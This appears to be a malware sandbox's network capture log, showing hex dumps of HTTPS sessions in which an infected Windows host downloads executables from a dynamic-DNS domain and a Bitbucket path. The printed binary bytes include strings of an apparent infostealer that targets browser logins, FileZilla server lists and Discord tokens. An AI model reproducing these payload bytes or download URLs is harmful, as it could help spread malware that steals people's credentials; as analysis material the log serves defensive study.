b0 81 81 bd bf 3e 77 99 af 52 3d b2 33 cd be b9 4e 8b 72 e4 30 4e 3a 53 fa 0d 86 c1 61 85 fd 63 13 6e d7 48 57 90 b3 84 b1 c4 ae aa 10 51 1c 39 76 dc ba
                                                                                                                                                        Data Ascii: lEC[Z>)-h\8` EqhbV!wfd"f59MK~]6{)s~fy;0SA4q-tlUaz|(PlLE>wR=3Nr0N:SacnHWQ9v
                                                                                                                                                        2021-12-28 02:24:06 UTC5863INData Raw: 0e 6b d0 c0 56 12 d8 ee 5c 06 a5 f7 8e cb 97 bf 22 5e 27 c8 a8 21 27 36 1c 8c a3 86 7b 53 03 59 7a 57 9d ca b6 70 7b cf 0d e7 b8 e5 04 98 7d 09 d7 c2 7b 0a 43 d9 0e 45 a8 68 f7 87 d0 d9 aa f6 82 4d b3 97 97 33 69 9a cc 57 5a 96 87 d1 dd 3e 81 55 94 21 ab 9d 32 8b c3 45 af 9b 8a 66 2b ba 43 7d 8b fc 8a e1 f9 24 c2 d9 1c dd e6 0d 00 1b 21 95 17 b9 17 f7 94 eb a0 60 81 2b e3 c6 0f 84 b4 e1 6b e4 48 74 cb 59 c3 d5 5f 07 02 c8 f0 b6 8a a5 19 28 5b 52 64 5d 59 b0 fb 86 63 54 67 74 9b 8f 5c 71 0f 96 a3 b1 15 6f 76 36 6c 8d 29 de 23 57 7c 4e f1 6d c0 7d af c3 ca ba 3e 3d 37 65 8f f5 dd a3 c5 f9 1e 0f 92 2c 7e 01 03 11 4a 0e 3b 41 22 a8 b0 d1 ee 42 3d ef c1 89 c7 5e c0 ef 39 0f 16 c5 92 b2 5f 41 74 c9 90 7c be de f5 a0 85 be fe 0f 7b 37 cc e0 e2 f3 6a ee fd 39 bd
                                                                                                                                                        Data Ascii: kV\"^'!'6{SYzWp{}{CEhM3iWZ>U!2Ef+C}$!`+kHtY_([Rd]YcTgt\qov6l)#W|Nm}>=7e,~J;A"B=^9_At|{7j9
                                                                                                                                                        2021-12-28 02:24:06 UTC5879INData Raw: 93 43 19 54 cf eb e2 88 4d 31 33 6e 05 1e 4f 44 57 2a 9a e9 83 ea e1 70 5b 4f e4 e4 6a 85 75 1a 72 56 af 93 a3 a2 c2 9f df 6c a3 2c f7 ed cf 42 3f d8 ef d6 b3 cb d3 62 e5 90 27 06 84 3b b1 97 e5 48 7a 55 df c2 c0 45 cd 32 6a fc 47 d5 1b a6 e4 36 83 3f 44 dd ab fd 50 f1 3d d4 59 74 01 6c 24 41 6a 83 90 c4 cb 6d 04 70 27 d8 bd 2b a1 f0 b4 57 d9 81 18 fb 2c 29 eb 2c e0 25 5e 7d 76 06 6c a5 dd b9 97 35 ed 6d c2 c8 f8 f0 9e f3 3d 84 91 b8 94 dc f7 b4 38 d9 90 f6 5f 0f 39 0b 20 6d f8 95 97 46 7e 84 7c 63 42 0f b1 0f 61 94 b7 2b 0b 64 32 cf 11 c4 24 d2 d6 2f 0e 2a 70 35 70 90 c5 c6 a9 38 73 20 7d f4 59 96 0e 1b 7a 1b 3e d7 a1 f9 29 4b 0f 73 27 fb 85 39 60 52 a4 19 4d 21 b4 b5 1a 0a dc 3f 24 8a 8c e8 86 41 88 a4 d9 a7 e4 0a 7d 09 1b 00 12 c5 a9 07 d3 dd f0 62 93
                                                                                                                                                        Data Ascii: CTM13nODW*p[OjurVl,B?b';HzUE2jG6?DP=Ytl$Ajmp'+W,),%^}vl5m=8_9 mF~|cBa+d2$/*p5p8s }Yz>)Ks'9`RM!?$A}b
                                                                                                                                                        2021-12-28 02:24:06 UTC5895INData Raw: a0 69 cf 7d 3c b5 32 dd 02 07 27 b8 cf 2c e8 cc 26 14 e4 e7 c0 b1 3d 38 b0 38 25 c6 63 29 0d 71 2d a2 ed ee 75 92 a5 f2 01 0c c3 05 2d d0 b5 c8 0c b2 04 82 30 c8 96 7c ff e8 6f 48 9b be 94 05 bd 0c 05 84 7c 36 44 5b dc 2a 20 34 ea cd 08 68 80 ce b9 df a8 ba b8 21 10 17 67 13 a8 9c 9e 10 10 77 c3 87 19 16 c4 5a 13 75 c5 24 13 9e 13 c8 9e ca e1 26 cf 8b 79 29 f1 35 31 c3 43 b3 74 ce 01 83 fb 2f 6f db 46 ba 2c 74 49 7b 0c b4 20 02 8a 99 36 71 d1 8c 89 a3 ae 90 90 7d 35 ed be 57 b9 00 1e 6c c5 d6 31 b4 b6 df 1b 4d f1 ff b0 5a 88 fd 4d 54 15 bb 77 0d 00 02 b3 20 7e 8c 8b 1f c9 38 43 13 6c 03 00 14 75 e4 e3 a4 10 e4 3f b4 48 0e dd 30 ce b4 f3 06 80 10 20 0c 57 eb 09 6b c5 35 fe f7 f6 05 a5 f3 fc 5b 74 da ef c3 79 a6 8d be 6a 76 80 e4 96 4c a2 c2 37 69 3e 96 34
                                                                                                                                                        Data Ascii: i}<2',&=88%c)q-u-0|oH|6D[* 4h!gwZu$&y)51Ct/oF,tI{ 6q}5Wl1MZMTw ~8Clu?H0 Wk5[tyjvL7i>4
                                                                                                                                                        2021-12-28 02:24:06 UTC5911INData Raw: d8 00 74 76 9e a5 c2 16 21 7d c4 ac 78 35 ec d5 34 e6 18 79 bf 5b ff 34 5b 48 e7 16 4f 80 d4 33 1c 75 ae fe 7a fd 73 70 3f 1a 36 65 d9 c5 2f 6b 35 a8 5a 7d e4 92 1d 7f d2 fc 6c f7 ce 9d e4 5b 37 f0 25 26 c5 4d 69 6c 60 76 56 c6 ae cc 35 69 81 ab 4b 15 bd ce db 8f 32 31 99 71 fc 28 1a fb 0c 28 51 4b 52 9f 84 c1 78 b2 05 65 87 76 0d 41 e4 af 1d 99 25 6d e7 8e 53 9b 94 b8 eb 41 b9 5b 8a d3 a1 da eb 1b ae fc 06 ff 04 2e 33 92 2c f3 7c 74 5b 12 f4 1b 33 21 47 16 39 72 42 0b 23 5e 09 15 82 f0 33 8d 05 e1 66 23 e2 63 f8 8f 17 1b b0 ba 47 95 56 7c 8a 71 3b bb 4a 03 34 69 66 89 17 68 f8 40 d0 a8 87 1b b0 06 e8 0d dd a1 d4 d8 14 d7 d9 38 da 69 1a d3 c3 c5 27 c7 39 5a 35 96 3a bb 9c c2 86 0e a9 80 60 cb 80 3b b1 9e 26 e3 13 2f d9 e7 93 d8 5d ea b5 ae 9c 76 17 fa 3c
                                                                                                                                                        Data Ascii: tv!}x54y[4[HO3uzsp?6e/k5Z}l[7%&Mil`vV5iK21q((QKRxevA%mSA[.3,|t[3!G9rB#^3f#cGV|q;J4ifh@8i'9Z5:`;&/]v<


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        8192.168.2.349874155.248.231.246443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:09 UTC5924OUTGET /x009B.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: downloafilesaccess.ddns.net
                                                                                                                                                        2021-12-28 02:24:09 UTC5924INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:09 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Last-Modified: Sun, 26 Dec 2021 18:01:39 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 115712
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        2021-12-28 02:24:09 UTC5925INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 6e 09 e3 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 90 01 00 00 30 00 00 00 00 00 00 ba 91 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgn00 @ @
                                                                                                                                                        2021-12-28 02:24:09 UTC5932INData Raw: 07 16 02 8e 69 1f 0f 59 28 72 00 00 0a 1f 10 8d 67 00 00 01 0c 07 8e 69 08 8e 69 59 8d 67 00 00 01 0d 07 07 8e 69 1f 10 59 08 16 1f 10 28 72 00 00 0a 07 16 09 16 07 8e 69 08 8e 69 59 28 72 00 00 0a 73 13 00 00 06 03 06 14 09 08 6f 20 00 00 06 13 04 de 05 26 de 00 14 2a 11 04 2a 00 00 01 10 00 00 00 00 1e 00 64 82 00 03 0f 00 00 01 1b 30 0b 00 c6 00 00 00 12 00 00 11 02 72 89 08 00 70 72 91 08 00 70 72 cb 08 00 70 28 22 00 00 06 0a 02 06 03 12 01 28 23 00 00 06 0c 12 04 04 05 0e 05 28 1a 01 00 06 11 04 13 05 02 06 28 21 00 00 06 8d 67 00 00 01 13 06 16 13 07 02 07 0e 04 0e 04 8e 69 12 04 11 06 11 06 8e 69 14 16 12 07 16 28 18 00 00 06 2c 06 73 74 00 00 0a 7a 11 07 8d 67 00 00 01 0d 02 07 0e 04 0e 04 8e 69 12 04 11 06 11 06 8e 69 09 09 8e 69 12 07 16 28 18
                                                                                                                                                        Data Ascii: iY(rgiiYgiY(riiY(rso &**d0rprprp("(#((!gii(,stzgiii(
                                                                                                                                                        2021-12-28 02:24:09 UTC5940INData Raw: 67 01 00 06 2a 00 00 13 30 05 00 55 00 00 00 00 00 00 00 03 6f 45 01 00 06 2c 4c 04 28 bc 01 00 06 28 11 00 00 06 6f 6b 01 00 06 04 28 bc 01 00 06 17 8d 38 00 00 02 25 16 73 a5 00 00 06 a2 28 8c 00 00 06 6f 6d 01 00 06 04 28 bc 01 00 06 17 8d 38 00 00 02 25 16 73 a8 00 00 06 a2 28 8c 00 00 06 6f 6f 01 00 06 2a 1a 7e 08 00 00 04 2a 1e 02 80 08 00 00 04 2a 1a 7e 09 00 00 04 2a 1e 02 80 09 00 00 04 2a 1e 02 28 65 00 00 0a 2a 72 02 17 2e 06 02 18 2e 08 2b 0c 73 4c 00 00 06 2a 73 66 00 00 06 2a 73 4c 00 00 06 2a 1b 30 06 00 16 01 00 00 26 00 00 11 73 a6 00 00 0a 0a 02 6f c9 00 00 0a 0b 38 e6 00 00 00 07 6f ca 00 00 0a 0c 08 6f 36 01 00 06 6f cb 00 00 0a 0d 38 b7 00 00 00 09 6f cc 00 00 0a 13 04 08 6f 34 01 00 06 72 2f 03 00 70 11 04 6f 26 01 00 06 28 62 00 00
                                                                                                                                                        Data Ascii: g*0UoE,L((ok(8%s(om(8%s(oo*~**~**(e*r..+sL*sf*sL*0&so8oo6o8oo4r/po&(b
                                                                                                                                                        2021-12-28 02:24:09 UTC5948INData Raw: 99 00 00 04 02 7b 12 00 00 04 06 8f 45 00 00 02 7b 99 00 00 04 72 01 0e 00 70 1a 6f f0 00 00 0a 17 58 6f f1 00 00 0a 17 8d 59 00 00 01 25 16 1f 2c 9d 6f 9c 00 00 0a 0b 16 13 04 2b 6e 07 11 04 07 11 04 9a 16 8d 59 00 00 01 6f f2 00 00 0a a2 07 11 04 9a 1f 20 6f f3 00 00 0a 13 05 11 05 16 31 10 07 11 04 07 11 04 9a 16 11 05 6f f4 00 00 0a a2 07 11 04 9a 72 05 0e 00 70 1a 6f f0 00 00 0a 2c 22 02 02 7b 11 00 00 04 11 04 17 58 28 1c 00 00 2b 7d 11 00 00 04 02 7b 11 00 00 04 11 04 07 11 04 9a a2 11 04 17 58 13 04 11 04 07 8e 69 17 59 31 89 02 02 7b 12 00 00 04 06 8f 45 00 00 02 7b 98 00 00 04 17 6a 59 02 7b 10 00 00 04 5a 28 ae 00 00 06 0d de 05 26 16 0d de 00 09 2a 41 1c 00 00 00 00 00 00 00 00 00 00 2d 01 00 00 2d 01 00 00 05 00 00 00 0a 00 00 01 1b 30 07 00
                                                                                                                                                        Data Ascii: {E{rpoXoY%,o+nYo o1orpo,"{X(+}{XiY1{E{jY{Z(&*A--0
                                                                                                                                                        2021-12-28 02:24:10 UTC5956INData Raw: 01 00 0a 6f 7e 01 00 0a 8c 72 00 00 01 72 7d 15 00 70 28 7f 01 00 0a 73 6e 01 00 0a 0b 07 6f 6f 01 00 0a 0c 08 6f 70 01 00 0a 0d 2b 61 09 6f 71 01 00 0a 74 4c 00 00 01 13 04 11 04 1a 8d 59 00 00 01 25 d0 bc 00 00 04 28 3a 00 00 0a 73 3b 00 00 0a 6f 72 01 00 0a 25 2d 04 26 14 2b 05 6f 88 00 00 0a 02 28 60 00 00 0a 2c 1e 06 11 04 72 58 16 00 70 6f 72 01 00 0a 25 2d 04 26 14 2b 05 6f 88 00 00 0a 6f cf 00 00 0a de 03 26 de 00 09 6f 74 01 00 0a 2d 97 de 0a 09 2c 06 09 6f 0b 00 00 0a dc de 0a 08 2c 06 08 6f 0b 00 00 0a dc de 0a 07 2c 06 07 6f 0b 00 00 0a dc de 03 26 de 00 06 2a 00 00 01 40 00 00 00 00 5f 00 51 b0 00 03 0a 00 00 01 02 00 50 00 6d bd 00 0a 00 00 00 00 02 00 49 00 80 c9 00 0a 00 00 00 00 02 00 42 00 93 d5 00 0a 00 00 00 00 00 00 06 00 db e1 00 03
                                                                                                                                                        Data Ascii: o~rr}p(snooop+aoqtLY%(:s;or%-&+o(`,rXpor%-&+oo&ot-,o,o,o&*@_QPmIB
                                                                                                                                                        2021-12-28 02:24:10 UTC5964INData Raw: 00 70 11 00 00 29 00 16 00 e7 00 01 00 10 00 f0 11 00 00 29 00 18 00 ec 00 01 00 10 00 4a 00 00 00 29 00 1e 00 fa 00 01 00 10 00 17 03 00 00 29 00 25 00 0a 01 01 00 10 00 08 05 00 00 29 00 29 00 13 01 01 01 00 00 6c 07 00 00 fd 00 2c 00 1a 01 09 01 10 00 e1 18 00 00 49 01 31 00 1a 01 09 01 10 00 54 19 00 00 49 01 3f 00 1d 01 09 01 10 00 07 19 00 00 49 01 42 00 1d 01 09 01 10 00 20 19 00 00 49 01 45 00 1e 01 01 01 00 00 65 09 00 00 fd 00 47 00 1f 01 01 01 00 00 37 0c 00 00 fd 00 4a 00 1f 01 01 00 10 00 0d 32 00 00 29 00 50 00 1f 01 01 00 10 00 70 0d 00 00 29 00 50 00 24 01 81 00 10 00 32 32 00 00 29 00 54 00 2d 01 01 00 10 00 af 0e 00 00 29 00 55 00 32 01 01 00 10 00 29 07 00 00 29 00 58 00 39 01 01 00 10 00 70 04 00 00 29 00 65 00 54 01 01 00 10 00 05 09
                                                                                                                                                        Data Ascii: p))J))%))l,I1TI?IB IEeG7J2)Pp)P$22)T-)U2))X9p)eT
                                                                                                                                                        2021-12-28 02:24:10 UTC5972INData Raw: 07 a7 17 a9 01 dd a7 00 00 00 00 86 08 63 07 b1 17 a9 01 e6 a7 00 00 00 00 86 08 53 09 a7 17 aa 01 ee a7 00 00 00 00 86 08 5c 09 b1 17 aa 01 f7 a7 00 00 00 00 86 08 25 0c a7 17 ab 01 ff a7 00 00 00 00 86 08 2e 0c b1 17 ab 01 08 a8 00 00 00 00 86 08 5e 0d a7 17 ac 01 10 a8 00 00 00 00 86 08 67 0d b1 17 ac 01 1c a8 00 00 00 00 86 18 a7 33 01 00 ad 01 a8 a8 00 00 00 00 86 08 5b 04 e4 00 ad 01 b0 a8 00 00 00 00 86 08 63 04 10 00 ad 01 b9 a8 00 00 00 00 86 08 00 07 e4 00 ae 01 c1 a8 00 00 00 00 86 08 08 07 10 00 ae 01 ca a8 00 00 00 00 86 08 e3 08 bc 17 af 01 d2 a8 00 00 00 00 86 08 eb 08 c2 17 af 01 db a8 00 00 00 00 86 18 a7 33 01 00 b0 01 e3 a8 00 00 00 00 86 08 5b 04 e4 00 b0 01 eb a8 00 00 00 00 86 08 63 04 10 00 b0 01 f4 a8 00 00 00 00 86 08 00 07 e4 00
                                                                                                                                                        Data Ascii: cS\%.^g3[c3[c
                                                                                                                                                        2021-12-28 02:24:10 UTC5979INData Raw: 03 e5 0a 1a 0a d9 02 67 27 27 0a 81 04 a7 33 36 0a 81 04 40 26 76 05 81 04 9c 3f 76 05 89 04 31 3e 3c 0a 89 04 ed 3b 45 0a 91 04 a7 33 01 00 91 04 46 20 36 0a 81 04 a7 33 01 00 81 04 b9 41 10 00 81 04 92 20 10 00 91 04 91 19 13 04 f1 02 e8 36 55 0a 89 04 31 3e 5c 0a 99 04 26 2b 63 0a 99 04 3b 2b 69 0a 99 04 c9 29 70 0a 81 01 a7 33 8f 00 a9 04 a1 21 76 0a 99 04 f1 29 82 0a e4 00 a7 33 01 00 84 01 99 33 39 00 8c 01 98 3d 27 00 e4 00 a7 1a b9 01 a1 01 a7 33 c0 0a 31 03 ef 27 ce 0a a9 01 a7 33 d5 0a a9 01 fb 27 df 0a c9 04 18 1d e4 00 b1 01 a7 33 01 00 b1 01 1d 29 05 00 b1 01 d5 3b 05 00 b1 01 52 27 f6 0a b1 01 48 27 00 0b f9 02 00 22 05 0b a4 01 a7 33 8f 00 b1 02 8e 22 30 0b ac 01 a7 33 8f 00 b1 02 39 41 5f 0b b4 01 a7 33 8f 00 b1 02 35 41 90 0b 9c 01 a7 33
                                                                                                                                                        Data Ascii: g''36@&v?v1><;E3F 63A 6U1>\&+c;+i)p3!v)339='31'3'3);R'H'"3"039A_35A3
                                                                                                                                                        2021-12-28 02:24:10 UTC5987INData Raw: 31 38 36 34 34 46 35 36 43 35 44 33 46 39 37 34 35 33 46 46 46 32 30 00 49 64 32 30 00 5f 5f 53 74 61 74 69 63 41 72 72 61 79 49 6e 69 74 54 79 70 65 53 69 7a 65 3d 33 30 00 5f 5f 53 74 61 74 69 63 41 72 72 61 79 49 6e 69 74 54 79 70 65 53 69 7a 65 3d 34 30 00 37 37 41 39 36 38 33 46 41 46 32 45 43 39 45 43 33 44 41 42 43 30 39 44 33 33 43 33 42 44 30 34 45 38 38 39 37 44 36 30 00 41 38 46 39 42 36 32 31 36 30 44 46 30 38 35 42 39 32 36 44 35 45 44 37 30 45 32 42 30 46 36 43 39 35 41 32 35 32 38 30 00 46 34 31 33 43 45 41 39 42 41 41 34 35 38 37 33 30 35 36 37 46 45 34 37 46 35 37 43 43 33 43 39 34 44 44 46 36 33 43 30 00 3c 3e 39 5f 5f 30 5f 30 00 3c 54 72 79 46 69 6e 64 3e 62 5f 5f 30 5f 30 00 3c 53 d1 81 d0 b0 6e 3e 62 5f 5f 30 5f 30 00 3c 2e 63 74 6f
                                                                                                                                                        Data Ascii: 18644F56C5D3F97453FFF20Id20__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=4077A9683FAF2EC9EC3DABC09D33C3BD04E8897D60A8F9B62160DF085B926D5ED70E2B0F6C95A25280F413CEA9BAA458730567FE47F57CC3C94DDF63C0<>9__0_0<TryFind>b__0_0<Sn>b__0_0<.cto
                                                                                                                                                        2021-12-28 02:24:10 UTC5995INData Raw: 00 52 65 61 64 43 6f 6e 74 65 78 74 54 61 62 6c 65 00 49 45 6e 75 6d 65 72 61 62 6c 65 00 49 44 69 73 70 6f 73 61 62 6c 65 00 56 69 73 69 62 6c 65 00 54 6f 44 6f 75 62 6c 65 00 52 75 6e 74 69 6d 65 46 69 65 6c 64 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e 64 6c 65 00 52 65 63 74 61 6e 67 6c 65 00 52 65 61 64 46 69 6c 65 00 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 00 70 72 6f 66 69 6c 65 00 68 4d 6f 64 75 6c 65 00 67 65 74 5f 4e 61 6d 65 00 73 65 74 5f 4e 61 6d 65 00 70 72 6f 63 4e 61 6d 65 00 66 69 65 6c 64 4e 61 6d 65 00 74 61 62 6c 65 4e 61 6d 65 00 73 65 74 5f 46 69 6c 65 4e 61 6d 65 00 66 69 6c 65 4e 61 6d 65 00 47 65 63 6b 6f 52 6f 61 6d 69 6e 67 4e 61 6d 65 00 43 68 72 6f 6d 65 47
                                                                                                                                                        Data Ascii: ReadContextTableIEnumerableIDisposableVisibleToDoubleRuntimeFieldHandleRuntimeTypeHandleGetTypeFromHandleRectangleReadFileDownloadFileprofilehModuleget_Nameset_NameprocNamefieldNametableNameset_FileNamefileNameGeckoRoamingNameChromeG
                                                                                                                                                        2021-12-28 02:24:10 UTC6003INData Raw: 00 55 73 65 72 45 78 74 00 4d 6f 76 65 4e 65 78 74 00 53 79 73 74 65 6d 2e 54 65 78 74 00 63 69 70 68 65 72 54 65 78 74 00 67 65 74 5f 49 6e 6e 65 72 54 65 78 74 00 63 68 69 70 65 72 54 65 78 74 00 52 65 61 64 46 69 6c 65 41 73 54 65 78 74 00 63 62 4d 61 63 43 6f 6e 74 65 78 74 00 70 62 4d 61 63 43 6f 6e 74 65 78 74 00 52 65 61 64 4d 61 73 74 65 72 4f 66 43 6f 6e 74 65 78 74 00 4f 70 65 72 61 74 69 6f 6e 43 6f 6e 74 65 78 74 00 69 76 00 67 65 74 5f 4e 6f 77 00 73 65 74 5f 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 00 53 68 6f 77 00 6b 61 73 64 69 68 62 66 70 66 64 75 71 77 00 42 72 45 78 00 65 6e 64 49 64 78 00 73 74 61 72 74 49 64 78 00 6e 49 6e 64 65 78 00 73 74 61 72 74 49 6e 64 65 78 00 72 6f 77 49 6e 64 65 78 00 52 65 67 65 78 00 4d 65 73 73 61 67 65
                                                                                                                                                        Data Ascii: UserExtMoveNextSystem.TextcipherTextget_InnerTextchiperTextReadFileAsTextcbMacContextpbMacContextReadMasterOfContextOperationContextivget_Nowset_CreateNoWindowShowkasdihbfpfduqwBrExendIdxstartIdxnIndexstartIndexrowIndexRegexMessage
                                                                                                                                                        2021-12-28 02:24:10 UTC6011INData Raw: 08 0e 03 07 01 0e 04 20 00 1d 03 03 20 00 08 08 00 03 1d 05 1d 03 08 08 07 07 04 0e 0e 1d 0e 08 09 20 02 1d 0e 1d 0e 11 81 81 12 10 01 02 15 12 80 a1 01 1e 00 15 12 80 a1 01 1e 00 08 03 0a 01 0e 0d 10 01 01 1d 1e 00 15 12 80 a1 01 1e 00 06 00 02 0e 0e 1d 0e 05 0a 01 12 81 08 05 07 02 08 1e 00 06 15 12 45 01 1e 00 07 15 12 49 02 1e 00 02 06 20 01 13 01 13 00 0b 07 03 15 12 2d 01 12 80 b8 0e 0e 06 00 01 0e 11 81 89 05 00 02 0e 0e 1c 0a 20 01 01 15 12 80 a1 01 13 00 12 07 05 15 12 2d 01 12 80 b8 12 51 12 55 12 80 b8 12 59 06 20 01 01 12 81 8d 05 20 00 12 81 91 05 20 00 12 81 95 05 20 01 12 5d 08 0b 07 04 12 80 b8 12 55 12 5d 12 59 06 00 03 0e 0e 0e 0e 05 00 00 12 81 99 05 20 01 0e 1d 05 19 07 07 15 12 2d 01 12 80 ac 15 12 35 01 0e 0e 15 11 39 01 0e 0e 0e 12
                                                                                                                                                        Data Ascii: EI - -QUY ]U]Y -59
                                                                                                                                                        2021-12-28 02:24:10 UTC6018INData Raw: 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 64 00 00 00 00 00 00 00 31 00 2a 00 2e 00 31 00 6c 00 31 00 64 00 31 00 62 00 00 00 00 00 00 00 50 00 72 00 6f 00 66 00 69 00 6c 00 65 00 5f 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 5f 00 76 00 61 00 6c 00 75 00 65 00 00 00 25 00 61 00 70 00 70 00 64 00 61 00 74 00 61 00 25 00 5c 00 00 00 00 00 6c 00 6f 00 67 00 69 00 6e 00 73 00 00 00 00 00 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 72 00 65 00 63 00 65 00 6e 00 74 00 73 00 65 00 72 00 76 00 65 00 72 00 73 00 2e 00 78 00 6d 00 6c 00 00 00 25 00 61 00 70 00 70 00 64 00 61 00 74 00 61 00 25 00 5c 00 64 00 69 00 73 00 63 00 6f 00 72 00 64 00 5c 00 4c 00 6f 00 63 00 61 00 6c 00 20 00 53 00 74 00 6f 00 72 00
                                                                                                                                                        Data Ascii: rocessId1*.1l1d1bProfile_encrypted_value%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Stor
                                                                                                                                                        2021-12-28 02:24:10 UTC6026INData Raw: 00 00 02 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00 07 00 00 00 07 00 00 00 08 00 00 00 08 00 00 00 08 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 09 00 00 00 0a 00 00 00 15 00 00 00 1e 00 00 00 1e 00 00 00 1d 00 00 00 1d 00 00 00 1e 00 00 00 20 00 00 00 26 00 00 00 34 00 00 00 41 00 00 00 50 00 00 00 64 00 00 00 73 20 29 38 d9 2c 3a 4f fe 2c 39 4f fe 2c 39 4f fe 2c 39 4f fe 2c 39 4f fe 2c 39 4e fe 2c 39 4e fe 2c 39 4e fe 2c 39 4e fe 29 35 48 e7 02 03 04 29 00 00 00 0b 00 00 00 02 00 00 00 02 00 00 00 04 00 00 00 07 00 00 00 0a 00 00 00 0c 00 00 00 0e 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 14 00 00 00 14 00 00 00 15 00 00 00 15 00 00 00 15 00 00 00 15 00 00 00 15
                                                                                                                                                        Data Ascii: &4APds )8,:O,9O,9O,9O,9O,9N,9N,9N,9N)5H)
                                                                                                                                                        2021-12-28 02:24:10 UTC6034INData Raw: a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 8f 7b a2 a6 83 7b a2 a6 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: {{{{{{{{{{{.


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        9192.168.2.349877104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:10 UTC6038OUTGET /georgindesign/desingner/downloads/Update.exe HTTP/1.1
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2021-12-28 02:24:10 UTC6038INHTTP/1.1 302 Found
                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                        Server: nginx
                                                                                                                                                        X-Usage-Quota-Remaining: 999311.670
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        X-Usage-Request-Cost: 699.33
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        X-B3-TraceId: 0d7d509787cc34d1
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:10 GMT
                                                                                                                                                        X-Usage-User-Time: 0.015870
                                                                                                                                                        X-Usage-System-Time: 0.005110
